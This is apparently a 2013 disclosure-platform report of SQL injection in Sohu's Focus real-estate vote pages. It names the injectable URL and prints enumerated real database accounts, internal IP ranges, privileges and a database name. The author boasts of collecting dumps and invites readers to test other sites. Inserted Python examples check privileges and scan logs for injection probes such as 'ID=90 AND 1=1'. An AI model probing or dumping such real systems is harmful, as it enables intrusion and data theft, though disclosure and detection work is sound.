2013-03-27: Details reported to the vendor, awaiting vendor handling
2013-03-27: Vendor confirmed; details disclosed to the vendor only
2013-04-06: Details disclosed to core white hats and experts in related fields
2013-04-16: Details disclosed to regular white hats
2013-04-26: Details disclosed to intern white hats
2013-05-11: Details disclosed to the public
After reading Daoge's (道哥) blackboard blog, I feel like I have never really done security, because I don't own a single "pair of pants" (裤子, slang for a dumped database)! Sohu, if you think this vulnerability is unimportant, feel free to keep ignoring it; I will just go and collect the dumps from every instance of this application nationwide! Jianxin (剑心), do you collect dumps?
The affected application is Sohu's Focus real-estate site (焦点房产网): the vote feature on every regional Focus site nationwide is injectable.
1) Just one example; test site: http://ts.focus.cn/vote/developer_intro.php?ID=90
2) Check what privileges the database user has; see for yourself:
[*] 'fdbuser'@'10.10.90.%' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE
[*] 'fdbuser'@'10.11.160.%' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE
[*] 'fdbuser'@'10.11.24.%' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE
[*] 'fdbuser'@'192.168.242.%' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE
[*] 'fdbuser'@'localhost' [19]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW VIEW privilege: UPDATE
[*] 'mysqlmon'@'192.168.242.180' (administrator) [26]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
[*] 'pingmysql'@'10.10.58.195' [1]: privilege: USAGE
[*] 'pingmysql'@'10.11.36.20' [1]: privilege: USAGE
[*] 'pingmysql'@'10.11.36.22' [1]: privilege: USAGE
[*] 'pingmysql'@'192.168.1.128' [1]: privilege: USAGE
[*] 'pingmysql'@'192.168.1.139' [1]: privilege: USAGE
[*] 'pingmysql'@'192.168.1.178' [1]: privilege: USAGE
[*] 'readonly'@'%' [2]: privilege: CREATE TEMPORARY TABLES privilege: SELECT
[*] 'repadm'@'192.168.242.%' [1]: privilege: REPLICATION SLAVE
[*] 'repadm'@'192.168.242.87' [1]: privilege: REPLICATION SLAVE
[*] 'repladmin'@'10.10.90.%' (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
[*] 'repladmin'@'192.168.242.%' [1]: privilege: REPLICATION SLAVE
[*] 'root'@'127.0.0.1' (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
[*] 'root'@'localhost' (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
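The listing above shows the web application's own account (fdbuser) holding ALTER, CREATE, DROP and similar rights that a vote page never needs, which is what turns one injectable parameter into a database-wide exposure. The following is an added example (not part of the report) that parses this sqlmap-style layout and flags every privilege outside a small allowlist; the sample text and the allowlist are constructed assumptions.

```python
"""Least-privilege check over a sqlmap-style MySQL privilege listing.

Added example, not part of the report: it parses the "[*] 'user'@'host' [N]:
privilege: X privilege: Y" layout quoted above and flags everything an
application account holds beyond a small allowlist.  The sample text and
the allowlist below are constructed assumptions, not data from the page."""
import re
from typing import Dict, List, Set

# Constructed sample in the same layout as the page's dump (two accounts,
# deliberately concatenated with no separator, as in the extracted text).
SAMPLE_DUMP = (
    "[*] 'fdbuser'@'10.10.90.%' [4]: privilege: ALTER privilege: DROP "
    "privilege: SELECT privilege: UPDATE"
    "[*] 'readonly'@'%' [2]: privilege: CREATE TEMPORARY TABLES privilege: SELECT"
)

# Assumed baseline for a web application account; tune per application.
APP_ALLOWLIST: Set[str] = {"SELECT", "INSERT", "UPDATE", "DELETE"}

# One account header: optional "(administrator)" tag, then "[count]:".
ENTRY_RE = re.compile(
    r"\[\*\] '([^']*)'@'([^']*)'(?: \(administrator\))? \[\d+\]:"
)


def parse_privileges(dump: str) -> Dict[str, Set[str]]:
    """Return {"user@host": {PRIVILEGE, ...}} for every account in the dump."""
    result: Dict[str, Set[str]] = {}
    headers = list(ENTRY_RE.finditer(dump))
    for i, head in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(dump)
        body = dump[head.end():end]
        # every privilege name is introduced by the literal token "privilege:"
        privs = {p.strip() for p in body.split("privilege:") if p.strip()}
        result[f"{head.group(1)}@{head.group(2)}"] = privs
    return result


def excess_privileges(dump: str, allow: Set[str] = APP_ALLOWLIST) -> Dict[str, List[str]]:
    """Map each account to its sorted privileges outside the allowlist."""
    return {acct: sorted(privs - allow)
            for acct, privs in parse_privileges(dump).items() if privs - allow}


if __name__ == "__main__":
    for acct, extra in excess_privileges(SAMPLE_DUMP).items():
        print(f"{acct}: beyond allowlist -> {', '.join(extra)}")
```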
3) The site's database;
4) Pick any database and dump its tables;
Database: tshouse [268 tables]
5) I also checked a few more sites; Focus real-estate sites all over the country are certain to have the same problem;
PS: you can test the rest yourselves!
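The one fact the report gives about the injection point is that the ID parameter of /vote/developer_intro.php is a numeric record id, which is enough to write a log check for it. The following is an added example (not part of the report): it reads combined-format web server logs and flags requests to that script whose ID does not decode to a plain integer; the log lines and client addresses are constructed, and nothing here is Sohu's own logging or code.

```python
"""Log review for the vote endpoint named in this report.

Added example, not part of the report: the ID parameter of
/vote/developer_intro.php is meant to be a numeric record id, so any request
whose ID decodes to something other than a plain integer is worth a look.
The log lines are constructed (placeholder client addresses), and the
combined-log parsing is generic, not Sohu's own logging."""
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/vote/developer_intro.php"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d{1,10}")

# Constructed Apache/nginx combined-format lines: one clean request, two
# malformed ID values, and one request to an unrelated script.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Mar/2013:10:39:01 +0800] "GET /vote/developer_intro.php?ID=90 HTTP/1.1" 200 5120
203.0.113.5 - - [27/Mar/2013:10:39:02 +0800] "GET /vote/developer_intro.php?ID=90%20AND%201%3D1 HTTP/1.1" 200 5120
203.0.113.5 - - [27/Mar/2013:10:39:03 +0800] "GET /vote/developer_intro.php?ID=90' HTTP/1.1" 500 214
198.51.100.7 - - [27/Mar/2013:10:40:00 +0800] "GET /vote/other.php?ID=abc HTTP/1.1" 200 100
"""


def suspicious_id(request_target: str) -> Optional[str]:
    """Return the decoded ID when it is not a plain integer, else None."""
    parts = urlsplit(request_target)
    if parts.path != ENDPOINT:
        return None
    # keep_blank_values so "?ID=" is still inspected rather than dropped
    for value in parse_qs(parts.query, keep_blank_values=True).get("ID", []):
        value = unquote(value)  # second pass catches double-encoded values
        if not INT_RE.fullmatch(value):
            return value
    return None


def scan_log(text: str) -> List[str]:
    """Return "client -> ID value" findings for every suspicious request."""
    findings: List[str] = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_id(match.group(1))
        if bad is not None:
            findings.append(f"{line.split(' ', 1)[0]} -> {bad}")
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```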
See the detailed description above.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-03-27 10:39
None yet.